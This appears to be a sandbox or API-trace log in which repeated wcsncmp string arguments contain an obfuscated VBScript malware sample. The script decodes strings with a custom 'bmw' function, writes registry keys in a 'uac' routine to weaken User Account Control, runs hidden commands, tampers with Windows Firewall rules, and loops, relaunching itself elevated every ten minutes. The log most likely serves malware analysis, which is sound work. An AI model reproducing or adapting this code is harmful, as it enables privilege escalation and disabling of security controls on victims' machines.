WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0222.990] wcsncmp (_String1="ject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 93 [0222.990] wcsncmp (_String1="ect(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.990] wcsncmp (_String1="ct(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0222.990] wcsncmp (_String1="t(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run 